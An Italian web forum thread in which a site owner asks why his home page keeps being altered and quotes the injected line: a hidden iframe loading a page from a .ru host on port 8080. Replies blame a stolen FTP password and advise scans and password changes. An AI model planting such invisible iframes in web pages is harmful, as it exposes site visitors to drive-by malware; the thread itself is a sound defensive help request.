Visualizzazione dei risultati da 1 a 4 su 4
  1. #1

    Chi mi modifica la home page?

    Ciao a tutti,
    da un pò di tempo mi sono accorto che periodicamente quando vado sulla mia home page mi da un messaggio di sintax error e devo riscaricare sul server il codice originale corretto della home page.
    Mi sono scaricato la versione danneggiata e ho visto che in fondo alla pagina sorgente è stata inserita una riga di codice che allego:

    "<iframe src="http://q3o.ru:8080/index.php" width=197 height=179 style="visibility: hidden"></iframe>"

    Mi sapere dire in che modo questa riga finisce dentro la mia home page e come posso evitare che ciò continui ad accadere?

    Mille grazie.
    Ciao e buon lavoro

  2. #2
    Hai qualche bug nel tuo sistema o qualcuno si e' impossessato della password del tuo ftp e ti inserisce del codice malevolo sulla tua pagina quell'iframe sicuramente puntera' a una pagina che ti riempie il computer di virus, ti consiglio di aggiornare l'antivirus e scansionare tutto il tuo pc e per sicurezza scaricarne un altro tipo avast e fare una nuova scansione
    Ciao

  3. #3
    Utente di HTML.it L'avatar di strae
    Registrato dal
    Apr 2008
    Messaggi
    407
    Originariamente inviato da kappaekappa
    Hai qualche bug nel tuo sistema o qualcuno si e' impossessato della password del tuo ftp e ti inserisce del codice malevolo sulla tua pagina quell'iframe sicuramente puntera' a una pagina che ti riempie il computer di virus, ti consiglio di aggiornare l'antivirus e scansionare tutto il tuo pc e per sicurezza scaricarne un altro tipo avast e fare una nuova scansione
    Ciao
    ... e già che ci sei cambia la password del tuo ftp
    You HAVE to assume your visitor is a maniac serial killer, out to destroy your application. And you have to prevent it.
    I can accept failure, everyone fails at something - But I can't accept not trying.

  4. #4
    Originariamente inviato da strae
    ... e già che ci sei cambia la password del tuo ftp
    Vero lo davo per scontato ma meglio specificare cambia anche tutte le tue password dato che potrebbero essere compromesse

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.